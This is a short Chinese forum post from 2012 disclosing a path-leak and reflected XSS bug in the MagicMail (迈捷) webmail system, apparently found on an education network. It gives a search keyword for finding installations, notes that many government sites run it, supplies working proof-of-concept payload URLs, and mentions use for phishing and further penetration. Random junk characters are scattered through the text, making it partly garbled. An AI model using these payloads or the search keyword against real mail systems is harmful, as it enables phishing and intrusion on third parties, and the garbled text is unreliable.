今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
~* i9 q" Q; m1 C0 n
3 v+ A1 v- y6 y$ J6 A
' T8 |2 o4 L8 k( c) N" G4 a" b' e包含 一个反射性XSS 以及 绝对路径泄漏
: s" S& k& e4 `* S5 p1 L看了看 貌似全部是linux的。6 }, T4 w7 c$ q% y9 E' o
. Q% i4 d% `% ~4 Y5 z7 E) ]
关键字:迈捷邮件系统 by MagicMail/ Y( U4 P$ k# G6 G0 d: @3 Z0 H7 o9 D: i
7 ]* `5 |, K2 [5 ^4 @, _; Z' f
可以看到很多政府网站都用这个邮件系统5 T/ E2 R7 x: w! S6 k
( f9 r& U, D" Z q4 L
绝对路径 http://madman.in/index.php?login_type=declare&language=4 _$ r8 o) h! ^' @
" T. q7 }/ T C6 m ]$ {
4 `: S, {/ [. v
) @8 H# v3 l% t9 E# A7 t
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E8 J" [% D0 e* l& @& E0 i
: E9 L# D) }" r* a5 G
5 T& k1 G: o7 O0 h0 T! |
0 ]3 f" [: ^/ D- X% K" x g! d' d X: N
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
% Z; f2 Z% E9 J; _
, ]" F1 w' f4 Y) I' D7 E: V修复方案:看官方补丁吧。- r3 q" Z0 ~2 ~$ f. C, H* f
|
发表于 2012-11-9 20:38:41
收藏
支持
反对